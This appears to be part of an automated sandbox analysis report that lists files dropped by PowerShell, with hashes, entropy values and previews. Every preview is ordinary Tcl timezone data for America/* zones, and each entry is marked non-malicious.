                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Pangnirtung) {.. {-9223372036854775808 0 0 -00}.. {-1546300800 -14400 0 AST}.. {-880221600 -10800 1 AWT}.. {-769395600 -10800 1 APT}.. {-765399600 -14400 0 AST}.. {-147902400 -7200 1 ADDT}.. {-131572800 -14400 0 AST}.. {325663200 -10800 1 ADT}.. {341384400 -14400 0 AST}.. {357112800 -10800 1 ADT}.. {372834000 -14400 0 AST}.. {388562400 -10800 1 ADT}.. {404888400 -14400 0 AST}.. {420012000 -10800 1 ADT}.. {436338000 -14400 0 AST}.. {452066400 -10800 1 ADT}.. {467787600 -14400 0 AST}.. {483516000 -10800 1 ADT}.. {499237200 -14400 0 AST}.. {514965600 -10800 1 ADT}.. {530686800 -14400 0 AST}.. {544600800 -10800 1 ADT}.. {562136400 -14400 0 AST}.. {576050400 -10800 1 ADT}.. {594190800 -14400 0 AST}.. {607500000 -10800 1 ADT}.. {625640400 -14400 0 AST}.. {638949600 -10800 1 ADT}.. {657090000 -14400 0 AST}.. {671004000 -10800 1 ADT}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):253
                                                                                                                                                                                                                              Entropy (8bit):4.784405839512086
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/290olofDm2OHekeoHXFIV/1Vw/9vVOzFZg/VVFAKV:MB86290oloLmdHeVCXqV/k/9v4zW/OW
                                                                                                                                                                                                                              MD5:BFCE7E2618D6935031D6941AD6DDD8E3
                                                                                                                                                                                                                              SHA1:1953CD224FB2363B10372C0476760F3FB020CB00
                                                                                                                                                                                                                              SHA-256:B3EE44B3526BEDFC25B806371D3C465FDBD6CC647F30BF093750651E4A0C1BE4
                                                                                                                                                                                                                              SHA-512:31262DF034E084DA4CDB57B99178594C29129F61F3535E5D8245B8BB4AB6BF314307B0F5E58B74C349684CD761C9CDE44EB10407FB135BA6427D3D1E9DA99B40
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Paramaribo) {.. {-9223372036854775808 -13240 0 LMT}.. {-1861906760 -13252 0 PMT}.. {-1104524348 -13236 0 PMT}.. {-765317964 -12600 0 -0330}.. {465449400 -10800 0 -03}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):496
                                                                                                                                                                                                                              Entropy (8bit):4.444598497301421
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB86290OXmdH514YCvb8o1W4S9xRvhhHRVxORBYUNv:5tekdvYP1x52yq
                                                                                                                                                                                                                              MD5:062ECA57C0B795780240CD7AFE70BDA0
                                                                                                                                                                                                                              SHA1:89D71A11DD8D4E000F7FADBDDC77C4C1DC1195F7
                                                                                                                                                                                                                              SHA-256:DFA0EC91804B789A1A7E1B1977710435D2589A5B54C1579C8E1F5BF96D2FD007
                                                                                                                                                                                                                              SHA-512:7D123AA872E0B8286A26E338AE0F8E0D7A6F0F2EA8B1EBEC6DBB59477C812985CB246AD397D0901A58FDB7FF14171CF60169DC15C538B95C58BD2D46106A7A4D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Phoenix) {.. {-9223372036854775808 -26898 0 LMT}.. {-2717643600 -25200 0 MST}.. {-1633273200 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1601823600 -21600 1 MDT}.. {-1583683200 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-820519140 -25200 0 MST}.. {-796841940 -25200 0 MST}.. {-94669200 -25200 0 MST}.. {-84380400 -21600 1 MDT}.. {-68659200 -25200 0 MST}.. {-56221200 -25200 0 MST}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6613
                                                                                                                                                                                                                              Entropy (8bit):3.8549788442269395
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5Ux+E2p3T6ZqrNSMEBPMcywh4NF5zCC7IOTWa1HW1241UWK9BDL+3XC4BMrS2LxP:KOfS0HY2iU7KKdFL6Aa2K4gSLf8e
                                                                                                                                                                                                                              MD5:A720323DF122C70C1530788DB24700BA
                                                                                                                                                                                                                              SHA1:20674BD7D84CC686ABBB5D6B36B520A5E9C813ED
                                                                                                                                                                                                                              SHA-256:A89C580899AD2FF8DF45A783BB90D501DC32C28B92931CA18ABD13453E76244B
                                                                                                                                                                                                                              SHA-512:02B71E537B9FDAF1B68E381F0007CCBBA53EB70719ED38F51B56C5BFA64C7E3D9797053C9DE3A920E5CAFA09BBC062FCED62B5D6B9213AFA8286B95DEDAB0532
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Port-au-Prince) {.. {-9223372036854775808 -17360 0 LMT}.. {-2524504240 -17340 0 PPMT}.. {-1670483460 -18000 0 EST}.. {421218000 -14400 1 EDT}.. {436334400 -18000 0 EST}.. {452062800 -14400 1 EDT}.. {467784000 -18000 0 EST}.. {483512400 -14400 1 EDT}.. {499233600 -18000 0 EST}.. {514962000 -14400 1 EDT}.. {530683200 -18000 0 EST}.. {546411600 -14400 1 EDT}.. {562132800 -18000 0 EST}.. {576050400 -14400 1 EDT}.. {594194400 -18000 0 EST}.. {607500000 -14400 1 EDT}.. {625644000 -18000 0 EST}.. {638949600 -14400 1 EDT}.. {657093600 -18000 0 EST}.. {671004000 -14400 1 EDT}.. {688543200 -18000 0 EST}.. {702453600 -14400 1 EDT}.. {719992800 -18000 0 EST}.. {733903200 -14400 1 EDT}.. {752047200 -18000 0 EST}.. {765352800 -14400 1 EDT}.. {783496800 -18000 0 EST}.. {796802400 -14400 1 EDT}.. {814946400 -18000 0 EST}.. {828856800 -14400 1 EDT}
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):207
                                                                                                                                                                                                                              Entropy (8bit):4.919510214047913
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290e7490ppv:MByMYbpwt290190b
                                                                                                                                                                                                                              MD5:4AB394CB233B101627136EB5E070CF9B
                                                                                                                                                                                                                              SHA1:F00600CD2DB10FE157C3696F665B9759EEA85F99
                                                                                                                                                                                                                              SHA-256:A4952380C89A6903FFE5BF8707B94B1BB72568FFD03DB04BF4D98E38AC82EEB7
                                                                                                                                                                                                                              SHA-512:58F4AD08FA10F1884FA641C4EA778C0FC013EABBD68DF5DE04D5B301227396260C3D669DB33DD6A6B33F1550C24BBD7777D756DF0D61CEEAF5EC6541EDFA296C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Port_of_Spain) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):201
                                                                                                                                                                                                                              Entropy (8bit):4.866417687745155
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7thteSHAIgpth9RN/290msh490th4:MByMYdIp7t290v490I
                                                                                                                                                                                                                              MD5:6B570E79FA2AA7D6CB1E56A11EE0A37C
                                                                                                                                                                                                                              SHA1:396A2C9BBE4F264DD5A4F2E44D3E63C57F52186B
                                                                                                                                                                                                                              SHA-256:52921EEA2A1925DF06CEA4638ED4128FAAA8FBA40ED4E0741650B419E5152DCB
                                                                                                                                                                                                                              SHA-512:FA75A179664BED02A0F5BC1B7C3DD5F3E986544A151634BA4C4401476F5999714C89E240D9AF805484D1BEC04A1A562157FAEECA1603C4FF8CFFB424B9DEB560
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Rio_Branco)]} {.. LoadTimeZoneFile America/Rio_Branco..}..set TZData(:America/Porto_Acre) $TZData(:America/Rio_Branco)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1051
                                                                                                                                                                                                                              Entropy (8bit):3.851275104153641
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5Xe4QJnSRs//SFs/pS9/MHSW/WOSr/nSso/TSL/SSU/iS5X/LcSi/xScd/ZlSQ/8:5kSeSFESoSQSrSsCSeSPS1cSQSQlSsSX
                                                                                                                                                                                                                              MD5:03046BA6F8344C32AD7A22748DC871AB
                                                                                                                                                                                                                              SHA1:AB9ED078D80AE99EF6DE4BF34AC45359B82D1284
                                                                                                                                                                                                                              SHA-256:E6E6F6753E7D443052A64D4DB07B8D443CE13A573946E7D0A19CDD4BBA4A2F04
                                                                                                                                                                                                                              SHA-512:620953BB4C8CF203262EC0C1F807543D24B9894C3B531AE57F7CEF630452CC9AC7CA41D43A6D8891F9CF17594E9EE34CF501F8508E7C0669A8E5EF9C70B6EAA3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Porto_Velho) {.. {-9223372036854775808 -15336 0 LMT}.. {-1767210264 -14400 0 -04}.. {-1206954000 -10800 1 -04}.. {-1191358800 -14400 0 -04}.. {-1175371200 -10800 1 -04}.. {-1159822800 -14400 0 -04}.. {-633816000 -10800 1 -04}.. {-622065600 -14400 0 -04}.. {-602280000 -10800 1 -04}.. {-591829200 -14400 0 -04}.. {-570744000 -10800 1 -04}.. {-560206800 -14400 0 -04}.. {-539121600 -10800 1 -04}.. {-531349200 -14400 0 -04}.. {-191361600 -10800 1 -04}.. {-184194000 -14400 0 -04}.. {-155160000 -10800 1 -04}.. {-150066000 -14400 0 -04}.. {-128894400 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-99950400 -10800 1 -04}.. {-89586000 -14400 0 -04}.. {-68414400 -10800 1 -04}.. {-57963600 -14400 0 -04}.. {499752000 -10800 1 -04}.. {511239600 -14400 0 -04}.. {530596800 -10800 1 -04}.. {540270000 -14400 0 -04}.. {562132800 -10800 1 -04}.. {5712012
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):283
                                                                                                                                                                                                                              Entropy (8bit):4.781646667761219
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/290piDm2OH9VoHvMlFoeVVF70ZVVFUFkzk/lLJpR/lAov:MB862908mdHvCvMlGe/J0Z/uFkzk/lL1
                                                                                                                                                                                                                              MD5:E2E2E0D6677FFF2E37BBFC3522F2A9AA
                                                                                                                                                                                                                              SHA1:4C1C93E14FBC00B8B1E78B8D9631599164305EB1
                                                                                                                                                                                                                              SHA-256:2981248A9F14EBFC8791EC5453170376CBD549557E495EA0E331CC18556C958E
                                                                                                                                                                                                                              SHA-512:F056B03EB9945823F5284C840E06E298DD2DE854F1555CD16D0BB19D962B73EF34A05683E6369B0D89CB7C3F7D082C312CCA6F8C6A0BB53F5C75FE4A863FCD95
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Puerto_Rico) {.. {-9223372036854775808 -15865 0 LMT}.. {-2233035335 -14400 0 AST}.. {-873057600 -10800 0 AWT}.. {-769395600 -10800 1 APT}.. {-765399600 -14400 0 AST}.. {-757368000 -14400 0 AST}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3729
                                                                                                                                                                                                                              Entropy (8bit):3.6253057710886956
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:2RPW7xUQjzoMUBI0nuUoDKlHslPlgiot7JC/Xk8NWse4r4g5xCEmSdLkUsZOn+ZW:247xUQjzoMUBI0nuUoDK6lPlgiot7JCV
                                                                                                                                                                                                                              MD5:D4ECD2A380E55A10FB97AB1D29C619F3
                                                                                                                                                                                                                              SHA1:AAAFF44590F08623BE6F61EA6EFF6488C99A73BF
                                                                                                                                                                                                                              SHA-256:4E626BD8B9182E56ADA1E9276585E945957431EA9BEA949CE071305E4E3C70A2
                                                                                                                                                                                                                              SHA-512:677EE7093A53B48DE526C5877DB7128E8746831FE0DC44A38EB84050757E6017C9471EEF9AFCCEEEB5794D1608E486840804C01BD6276EA53F3C7823B05ED62B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Punta_Arenas) {.. {-9223372036854775808 -17020 0 LMT}.. {-2524504580 -16965 0 SMT}.. {-1892661435 -18000 0 -05}.. {-1688410800 -16965 0 SMT}.. {-1619205435 -14400 0 -04}.. {-1593806400 -16965 0 SMT}.. {-1335986235 -18000 0 -05}.. {-1335985200 -14400 1 -05}.. {-1317585600 -18000 0 -05}.. {-1304362800 -14400 1 -05}.. {-1286049600 -18000 0 -05}.. {-1272826800 -14400 1 -05}.. {-1254513600 -18000 0 -05}.. {-1241290800 -14400 1 -05}.. {-1222977600 -18000 0 -05}.. {-1209754800 -14400 1 -05}.. {-1191355200 -18000 0 -05}.. {-1178132400 -14400 0 -04}.. {-870552000 -18000 0 -05}.. {-865278000 -14400 0 -04}.. {-736632000 -14400 1 -04}.. {-718056000 -18000 0 -05}.. {-713649600 -14400 0 -04}.. {-36619200 -10800 1 -04}.. {-23922000 -14400 0 -04}.. {-3355200 -10800 1 -04}.. {7527600 -14400 0 -04}.. {24465600 -10800 1 -04}.. {37767600 -14400 0 -04}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):196
                                                                                                                                                                                                                              Entropy (8bit):4.926514352074701
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7pYHAIgppuRN/290ly90pl:MByMY/pcRt290w90X
                                                                                                                                                                                                                              MD5:552FBD2FBAD42F79C7993124D9CCC54B
                                                                                                                                                                                                                              SHA1:9029B7CCE8A5AD0F14C05FFBCDA4CA225DEC1708
                                                                                                                                                                                                                              SHA-256:FEC74A3FCBD9B99FDFF24B54223DA187958697CBE756A54592F6171C69F1403F
                                                                                                                                                                                                                              SHA-512:96315C32C1D0DEF804A560022DA12B3C63200A680F2A37D1B03E1C9EA413842EB6051E1C2315AE4E7C374280AD0E59832F834A8D6D66E259EF62735A77917ECE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Winnipeg)]} {.. LoadTimeZoneFile America/Winnipeg..}..set TZData(:America/Rainy_River) $TZData(:America/Winnipeg)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7614
                                                                                                                                                                                                                              Entropy (8bit):3.8349162993762267
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:Wi8h4ZlNA604qSScBgN+4ctDzIVQ/c/3hNxTh:bqOfA604qSBgI7DBch
                                                                                                                                                                                                                              MD5:793DAEDB7E3077DE52DCC3C8A7CBEC5B
                                                                                                                                                                                                                              SHA1:37562E9F28D51DED41FFD5FF2FF19E2E4E453B7A
                                                                                                                                                                                                                              SHA-256:AA8866D58BEAB07548180628FF423887BBF48AADB1B55392B288F7310F94A9B1
                                                                                                                                                                                                                              SHA-512:68A32B41DC2D3E730D6BE53656B0D566AB1BCC1E189A2FFDB5687A947EF4F4008BC17456F8CE0D59C838EEA87A44400231A44E6AB35BEDBF5D7779E1CD7EFD8A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Rankin_Inlet) {.. {-9223372036854775808 0 0 -00}.. {-410227200 -21600 0 CST}.. {-147895200 -14400 1 CDDT}.. {-131565600 -21600 0 CST}.. {325670400 -18000 1 CDT}.. {341391600 -21600 0 CST}.. {357120000 -18000 1 CDT}.. {372841200 -21600 0 CST}.. {388569600 -18000 1 CDT}.. {404895600 -21600 0 CST}.. {420019200 -18000 1 CDT}.. {436345200 -21600 0 CST}.. {452073600 -18000 1 CDT}.. {467794800 -21600 0 CST}.. {483523200 -18000 1 CDT}.. {499244400 -21600 0 CST}.. {514972800 -18000 1 CDT}.. {530694000 -21600 0 CST}.. {544608000 -18000 1 CDT}.. {562143600 -21600 0 CST}.. {576057600 -18000 1 CDT}.. {594198000 -21600 0 CST}.. {607507200 -18000 1 CDT}.. {625647600 -21600 0 CST}.. {638956800 -18000 1 CDT}.. {657097200 -21600 0 CST}.. {671011200 -18000 1 CDT}.. {688546800 -21600 0 CST}.. {702460800 -18000 1 CDT}.. {719996400 -21600 0 CST}.. {7
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1420
                                                                                                                                                                                                                              Entropy (8bit):3.78262494063765
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5aLexyGcChlrLPsw6kSS3h5R14eH8tf3GvIkuoYVZaI1kR8nd:5eTChlvEw6kSSx5H4a8tf3fkuoYVZDm+
                                                                                                                                                                                                                              MD5:4D12651CEE804EB9F29567CB37F12031
                                                                                                                                                                                                                              SHA1:54B2613475B8BDB1DBCCA53A4895DA021F66BDC0
                                                                                                                                                                                                                              SHA-256:A36AD4614FC9A2A433712B555156EDE03980B88EB91D8DC7E8B10451D6D7F7D3
                                                                                                                                                                                                                              SHA-512:E6690F6B6DF613C8B7289A2DB71FBC9B87B997707A6C3B4B45BDE8F347082AE8C69F212BAACE50F3C04E325ABE0976AF1F61107BDF8A15D5B88F11FAE11A9D00
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Recife) {.. {-9223372036854775808 -8376 0 LMT}.. {-1767217224 -10800 0 -03}.. {-1206957600 -7200 1 -03}.. {-1191362400 -10800 0 -03}.. {-1175374800 -7200 1 -03}.. {-1159826400 -10800 0 -03}.. {-633819600 -7200 1 -03}.. {-622069200 -10800 0 -03}.. {-602283600 -7200 1 -03}.. {-591832800 -10800 0 -03}.. {-570747600 -7200 1 -03}.. {-560210400 -10800 0 -03}.. {-539125200 -7200 1 -03}.. {-531352800 -10800 0 -03}.. {-191365200 -7200 1 -03}.. {-184197600 -10800 0 -03}.. {-155163600 -7200 1 -03}.. {-150069600 -10800 0 -03}.. {-128898000 -7200 1 -03}.. {-121125600 -10800 0 -03}.. {-99954000 -7200 1 -03}.. {-89589600 -10800 0 -03}.. {-68418000 -7200 1 -03}.. {-57967200 -10800 0 -03}.. {499748400 -7200 1 -03}.. {511236000 -10800 0 -03}.. {530593200 -7200 1 -03}.. {540266400 -10800 0 -03}.. {562129200 -7200 1 -03}.. {571197600 -10800 0 -03}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1781
                                                                                                                                                                                                                              Entropy (8bit):4.034282439637634
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB86290hjmdHfCv24Q1NAvHaE+YB+Q4kRcMxIeRUVX/SEQd1rRR9xRv0+Ro/wPjp:5EjeavTGOtAVvSRBpx0yq1epwD+yz+
                                                                                                                                                                                                                              MD5:14B29B4391B643E5707096ADCC33C57E
                                                                                                                                                                                                                              SHA1:B3F875ABB79C634C74307B7CB7B276B13AEE11D1
                                                                                                                                                                                                                              SHA-256:50105E788288CF4C680B29BBDCDE94D8713A5361B38C6C469FD97CF05503FF7D
                                                                                                                                                                                                                              SHA-512:D92A51547DF2C1AB6E6CDEFF34C07B755D3F6BB5E7DD1907693E7658EDE4D2BADC5DEFDB658ADD0F8D8F14B3B87CEA17BC00DAC364C5CB7ACBF8778C245276A9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Regina) {.. {-9223372036854775808 -25116 0 LMT}.. {-2030202084 -25200 0 MST}.. {-1632063600 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1251651600 -21600 1 MDT}.. {-1238349600 -25200 0 MST}.. {-1220202000 -21600 1 MDT}.. {-1206900000 -25200 0 MST}.. {-1188752400 -21600 1 MDT}.. {-1175450400 -25200 0 MST}.. {-1156698000 -21600 1 MDT}.. {-1144000800 -25200 0 MST}.. {-1125248400 -21600 1 MDT}.. {-1111946400 -25200 0 MST}.. {-1032714000 -21600 1 MDT}.. {-1016992800 -25200 0 MST}.. {-1001264400 -21600 1 MDT}.. {-986148000 -25200 0 MST}.. {-969814800 -21600 1 MDT}.. {-954093600 -25200 0 MST}.. {-937760400 -21600 1 MDT}.. {-922039200 -25200 0 MST}.. {-906310800 -21600 1 MDT}.. {-890589600 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-748450800 -21600 1 MDT}.. {-732729600 -25200 0 MST
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7610
                                                                                                                                                                                                                              Entropy (8bit):3.8312000314798085
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:li8h4Z80NA604qSScBgN+4ctDzIVQ/c/3hNxTh:EqOzA604qSBgI7DBch
                                                                                                                                                                                                                              MD5:541EACD872723603971058CB205121D7
                                                                                                                                                                                                                              SHA1:8F7DFD5ECA2913846D9342839AE1C60882153DA0
                                                                                                                                                                                                                              SHA-256:643CC43E3F906779C040E1F0C20E78D6E95CC7301B3C7370A8ADBCBD76A8C5E8
                                                                                                                                                                                                                              SHA-512:971D06D3FB67B7AE79EEDB6D3EBB805B5992C2BF4A7166016B405E21BFB25D9A87A757E8065073D5FBEB9084F6F742269A5BF432BF2F03D30913DB092E1AB3A1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Resolute) {.. {-9223372036854775808 0 0 -00}.. {-704937600 -21600 0 CST}.. {-147895200 -14400 1 CDDT}.. {-131565600 -21600 0 CST}.. {325670400 -18000 1 CDT}.. {341391600 -21600 0 CST}.. {357120000 -18000 1 CDT}.. {372841200 -21600 0 CST}.. {388569600 -18000 1 CDT}.. {404895600 -21600 0 CST}.. {420019200 -18000 1 CDT}.. {436345200 -21600 0 CST}.. {452073600 -18000 1 CDT}.. {467794800 -21600 0 CST}.. {483523200 -18000 1 CDT}.. {499244400 -21600 0 CST}.. {514972800 -18000 1 CDT}.. {530694000 -21600 0 CST}.. {544608000 -18000 1 CDT}.. {562143600 -21600 0 CST}.. {576057600 -18000 1 CDT}.. {594198000 -21600 0 CST}.. {607507200 -18000 1 CDT}.. {625647600 -21600 0 CST}.. {638956800 -18000 1 CDT}.. {657097200 -21600 0 CST}.. {671011200 -18000 1 CDT}.. {688546800 -21600 0 CST}.. {702460800 -18000 1 CDT}.. {719996400 -21600 0 CST}.. {73391
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1112
                                                                                                                                                                                                                              Entropy (8bit):3.8413073465060457
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5Ybe/k5Yss/uuD/uVK/uNC/uvFe/uxJs/u74O/u83C/uc8J/uhF8/uNHs/ulU6Gs:505YsMw57XJh4CxUF/A6GTrtSUDwr
                                                                                                                                                                                                                              MD5:7E23FDE0E158E8ED2E7536EDE70D2588
                                                                                                                                                                                                                              SHA1:319052BE076DC79F130E807D68B11CCAA0636340
                                                                                                                                                                                                                              SHA-256:28082D20872B61D6098D31D1C40F12464A946A933CD9AF74475C5AF384210890
                                                                                                                                                                                                                              SHA-512:BE078ED12F05AB5CEE5D77212EB76A01A1BC52EEAA17E3B91D93B88D75E5281B6AF164E712A9AB0F57A21B3CDB20F6FCCADB73CAC4745B5D2E665D18F9F06B55
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Rio_Branco) {.. {-9223372036854775808 -16272 0 LMT}.. {-1767209328 -18000 0 -05}.. {-1206950400 -14400 1 -05}.. {-1191355200 -18000 0 -05}.. {-1175367600 -14400 1 -05}.. {-1159819200 -18000 0 -05}.. {-633812400 -14400 1 -05}.. {-622062000 -18000 0 -05}.. {-602276400 -14400 1 -05}.. {-591825600 -18000 0 -05}.. {-570740400 -14400 1 -05}.. {-560203200 -18000 0 -05}.. {-539118000 -14400 1 -05}.. {-531345600 -18000 0 -05}.. {-191358000 -14400 1 -05}.. {-184190400 -18000 0 -05}.. {-155156400 -14400 1 -05}.. {-150062400 -18000 0 -05}.. {-128890800 -14400 1 -05}.. {-121118400 -18000 0 -05}.. {-99946800 -14400 1 -05}.. {-89582400 -18000 0 -05}.. {-68410800 -14400 1 -05}.. {-57960000 -18000 0 -05}.. {499755600 -14400 1 -05}.. {511243200 -18000 0 -05}.. {530600400 -14400 1 -05}.. {540273600 -18000 0 -05}.. {562136400 -14400 1 -05}.. {57120480
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):219
                                                                                                                                                                                                                              Entropy (8bit):4.801485647578614
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7/MSHAIgp/M1ovN/290rI5290/M7:MByMY/M7p/M16t290r190/M7
                                                                                                                                                                                                                              MD5:90830F3B1F91FE48AC2944C7C92A3F6E
                                                                                                                                                                                                                              SHA1:777377AE4959DDD2B472EB6041A23A5B93D64BB6
                                                                                                                                                                                                                              SHA-256:0117D33D4F326AA536162D36A02439FBD5F2EB3B4F540B5BA91ED7747DDAC180
                                                                                                                                                                                                                              SHA-512:20A371E4550E402AFEB83EF19EFFF6B3C0D7A68DCAA06AD894D04DB63B7096560E701C45B455B23A98BB20FE3B590F920219152415CA506AEDA427BB1381B826
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Argentina/Cordoba)]} {.. LoadTimeZoneFile America/Argentina/Cordoba..}..set TZData(:America/Rosario) $TZData(:America/Argentina/Cordoba)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):194
                                                                                                                                                                                                                              Entropy (8bit):4.869058214823402
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7ekHAIgpeON/290tX2U490eBn:MByMYMpJt290c90m
                                                                                                                                                                                                                              MD5:F4E62378AA05771D348AA6DA516CD386
                                                                                                                                                                                                                              SHA1:07FCA813693F7944CBCBB128F2F2FE32929D37A2
                                                                                                                                                                                                                              SHA-256:3B4C2F3A5B9CD22A73F05187C032723D07BB53C9946D04D35E1BA1CB90CA0A62
